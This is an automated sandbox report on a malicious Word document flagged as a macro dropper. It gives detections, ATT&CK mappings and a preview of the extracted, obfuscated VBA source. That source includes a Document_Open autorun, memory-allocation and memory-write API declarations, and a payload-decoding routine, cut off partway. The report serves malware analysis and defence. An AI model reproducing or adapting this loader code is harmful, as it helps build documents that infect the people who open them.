MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro, which is a common technique for initial execution. The ClamAV detection 'Doc.Dropper.Agent-6574852-0' strongly suggests its role as a dropper. The VBA code, while obfuscated, includes API declarations for memory manipulation and timer creation, indicating a sophisticated payload execution mechanism. The primary function of the Document_Open macro appears to be the initiation of this payload.
Heuristics 4
-
ClamAV: Doc.Dropper.Agent-6574852-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6574852-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11831 bytes |
SHA-256: 0e80e342f5aee52d2a2ec28b7ccc96b93fa3cbe2edbc17451253d60036ae9eea |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() impacted = smoggy kneeler leonem = 30 + 22 Pmt 0, leonem, 4386, 59801, 6 End Sub Attribute VB_Name = "axiology" #If (76 - 21 + 345 + 62 - 50 + 288) > ((115 - 16 + 221) - (124 - 55 + 471) * 1) And Not ((70 - 118 + 76) - (1 - 25 + 52)) * 2 < (Win64) Then Public Declare Function feces _ Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (affricate As Any, ByVal idicate As Any, ByVal injection As Any, ByVal dsillusionner As Any, ByVal dolore As Any, ByVal tricentenary As Any, ByVal phosphorous As Any) As Long Public Declare Function animating _ Lib "ntdll " Alias _ "ZwWriteVirtualMemory" (ByVal shrewishly As Any, ByVal conversely As Any, ByVal circles As Any, ByVal voltaic As Any, ByVal bone As Any) As Long Public Declare Function calculatingly _ Lib "ntdll " Alias _ "NtAllocateVirtualMemory" (dysplasia As Long, conventional As Long, ByVal savara As Long, biggestByVal As Long, booze As Long, ByVal cacation As Long) As Long #End If Function haber(corkage) As String Dim chinaware As Long Dim distribute(63) As Long Dim furrow() As Byte aileron = amusement * 3 Dim invigorate(6962) As Byte Dim all As Long Dim blackwater As Long Dim footbridge As Integer Dim amplification(63) As Long Dim appulse As String Dim aleurone As Long Dim curium(63) As Long balefully = 127 - 124 + 258045 unsleeping = 27 - 21 + 249 have = 52 - 114 + 126 important = 116 - 27 + 16711591 miserabile = 6 - 86 + 4112 crimson = 92 - 66 + 4070 Dim antigua As Byte fing = 62 - 120 + 65594 millgirl = 124 - 89 + 65245 Dim clinodactyly As Integer Dim lutefisk As Long netherlander = 69 - 85 + 272 peppy = 39 - 32 + 56 aleyrodes = 26 - 117 + 262235 adapa = 60 - 51 + 16515063 Dim engraulidae As String dearest = 95 - 63 + 7811 Dim prissy() As Byte prissy = VBA.StrConv(corkage, 120 + 8) disfranchisement = 8 + 42 Pmt 0, disfranchisement, 27945, 56453, 4 bier = 7843 bedpost = vbKeyShift - 12 For imbalance = 0 To bier If imbalance Mod 2 = 0 Then prissy(imbalance) = prissy(imbalance) - bedpost Else prissy(imbalance) = prissy(imbalance) - (bedpost - 1) End If Next imbalance jacamar = 34 + 8 Pmt 0, jacamar, 36208, 10396, 4 footbridge = 0 braille = ominous For blackwater = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6) amplification(blackwater) = ashtoreth(blackwater, have, 68) distribute(blackwater) = ashtoreth(blackwater, crimson, 68) curium(blackwater) = ashtoreth(blackwater, aleyrodes, 68) Next blackwater aevi = 25 + 57 Pmt 0, aevi, 11162, 29589, 7 furrow = prissy foreday = 12 - 112 + 104 candlemaker = 3 + 46 Pmt 0, candlemaker, 31387, 40243, 6 fortemente = 14 - 29 + 18 deliverance = artilleryman aileron = Math.Round(64) silentio = fortemente + 1 ecclesiology = 128 - 5 - 121 For aleurone = 0 To bier consular = furrow(aleurone) bellows = furrow(aleurone + 2) dd = distribute(braille(furrow(aleurone + 1))) millisecond = amplification(braille(bellows)) + braille(furrow(aleurone + fortemente)) all = curium(braille(consular)) + dd + millisecond blackwater = ashtoreth(all, important, 60) invigorate(chinaware) = ashtoreth(blackwater, fing, 50) blackwater = ashtoreth(all, millgirl, 60) invigorate(chinaware + 1) = ashtoreth(blackwater, netherlander, 50) invigorate(chinaware + ecclesiology) = ashtoreth(all, unsleeping, 60) chinaware = chinaware + ecclesiology + 1 aleurone = aleurone + 3 Next haber = invigorate End Function Function ominous() Dim carnality(255) As Byte artful = 96 - 85 + 54 For i = artful To (98 - 109 + 102) carnality(artful) = artful - (2 - 38 + 101) artful = artful + 1 If (20 - 10 + 81) < artful Then fecerat = almightiness + 44 - 40 + 61 Exit For End If doings = silicosis + 48 - 29 + 46 Next artful = (39 - 95 + 104) For i ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.